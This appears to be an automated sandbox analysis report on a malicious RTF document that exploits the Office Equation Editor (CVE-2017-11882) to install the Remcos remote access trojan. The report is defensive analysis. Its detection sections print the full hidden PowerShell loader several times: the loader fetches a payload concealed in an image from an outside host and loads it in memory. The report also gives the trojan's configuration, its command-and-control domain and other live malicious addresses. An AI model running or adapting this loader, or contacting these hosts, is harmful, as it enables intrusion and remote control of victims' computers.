Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\RMCD.vbs", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\RMCD.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CMR/77662/62.412.012.291//:ptth' , '1' , 'C:\ProgramData\' , 'RMCD','RegAsm',''))} }", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2824, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\RMCD.vbs", ProcessId: 3188, ProcessName: cmd.exe

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CMR/77662/62.412.012.291//:ptth' , '1' , 'C:\ProgramData\' , 'RMCD','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CMR/77662/62.412.012.291//:ptth' , '1' , 'C:\ProgramData\' , 'RMCD','RegAsm',''))} }", CommandLine|base64offs

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CMR/77662/62.412.012.291//:ptth' , '1' , 'C:\ProgramData\' , 'RMCD','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CMR/77662/62.412.012.291//:ptth' , '1' , 'C:\ProgramData\' , 'RMCD','RegAsm',''))} }", CommandLine|base64offs

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\luckymokeykissinglover.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\luckymokeykissinglover.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1644, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\luckymokeykissinglover.vbs" , ProcessId: 1096, ProcessName: wscript.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1644, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2452, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2040, TargetFilename: C:\Users\user\AppData\Local\Temp\h2yqq1dw.b0r.ps1

Data Obfuscation

Sigma detected: Powershell download and load assembly

Source: Process started

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: E8 57 C4 78 39 04 3F 17 F3 56 78 97 DF ED F5 49 1D A6 26 E5 C2 DC 40 D6 37 5C C9 A8 DA A1 48 48 A8 F3 53 1E 43 56 3D D8 3E 41 0E D1 55 14 03 B3 9B F9 10 26 E3 C9 E3 2C BC C4 2B 0B 7D FD 4D A7 BF 41 6D C6 E6 12 8F B3 79 63 C2 73 4B CB 7E 36 F0 9D 31 F0 E4 F9 6A 4A 87 B4 C5 3B 3D 65 09 73 42 D1 FC 42 82 17 8C 1B 83 48 8F 10 25 75 89 18 41 27 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3212, TargetObject: HKEY_CURRENT_USER\Software\Rmc-76C83U\exepath

Snort Signatures

ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1 - Source IP: 192.210.214.26 - Destination IP: 192.168.2.22

Timestamp:	04/24/24-10:24:19.607000
SID:	2020423
Source Port:	80
Destination Port:	49165
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1 - Source IP: 192.210.214.26 - Destination IP: 192.168.2.22

Timestamp:	04/24/24-10:24:19.607000
SID:	2020424
Source Port:	80
Destination Port:	49165
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf

Avira: detected

Antivirus detection for URL or domain

Source: http://geoplugin.net/json.gp	URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp/C	URL Reputation: Label: phishing
Source: http://192.210.214.26/26677/IEinternetMonkeykisserpdf.html~~C:	Avira URL Cloud: Label: malware
Source: http://192.210.214.26/26677/IEinternetMonkeykisserpdf.htmlj	Avira URL Cloud: Label: malware
Source: remcjulia.duckdns.org	Avira URL Cloud: Label: malware
Source: http://192.210.214.26/26677/RMC.txt	Avira URL Cloud: Label: malware
Source: http://192.210.214.26/26677/IEinternetMonkeykisserpdf.html	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6C8F4896-7948-479F-8EE2-C642D1E95148}.tmp

Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen

Found malware configuration

Source: 0000000B.00000002.872587798.0000000000A01000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "remcjulia.duckdns.org:14645:1", "Assigned name": "Zynova", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-76C83U", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for domain / URL

Source: remcjulia.duckdns.org	Virustotal: Detection: 11%	Perma Link
Source: uploaddeimagens.com.br	Virustotal: Detection: 6%	Perma Link
Source: remcjulia.duckdns.org	Virustotal: Detection: 11%	Perma Link
Source: http://192.210.214.26/26677/RMC.txt	Virustotal: Detection: 15%	Perma Link
Source: https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029	Virustotal: Detection: 5%	Perma Link
Source: https://uploaddeimagens.com.br	Virustotal: Detection: 6%	Perma Link
Source: http://192.210.214.26/26677/IEinternetMonkeykisserpdf.html	Virustotal: Detection: 15%	Perma Link

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf	ReversingLabs: Detection: 60%
Source: SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf	Virustotal: Detection: 55%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.4179110.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.4179110.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.872587798.0000000000A01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.391262548.0000000003F96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3212, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

11_2_00433837

Source: powershell.exe, 00000008.00000002.391262548.0000000003F96000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_21c9bae9-9

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.4179110.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.4179110.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.391262548.0000000003F96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3212, type: MEMORYSTR

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 192.210.214.26 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_004074FD _wcslen,CoGetObject,

11_2_004074FD

Source: unknown

HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.22:49163 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.22:49162 version: TLS 1.2

Source:	Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.391262548.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256n source: powershell.exe, 00000008.00000002.391262548.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_00409253
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	11_2_0041C291
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	11_2_0040C34D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_00409665
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0044E879 FindFirstFileExA,	11_2_0044E879
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	11_2_0040880C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040783C FindFirstFileW,FindNextFileW,	11_2_0040783C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	11_2_00419AF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	11_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	11_2_0040BD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

11_2_00407C97

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035C065A URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_035C065A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035C0688 ShellExecuteW,ExitProcess,	2_2_035C0688
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035C05B9 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_035C05B9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035C05D3 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_035C05D3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035C0673 ShellExecuteW,ExitProcess,	2_2_035C0673
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035C04EC ExitProcess,	2_2_035C04EC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035C06AD ExitProcess,	2_2_035C06AD

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe	Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: uploaddeimagens.com.br
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
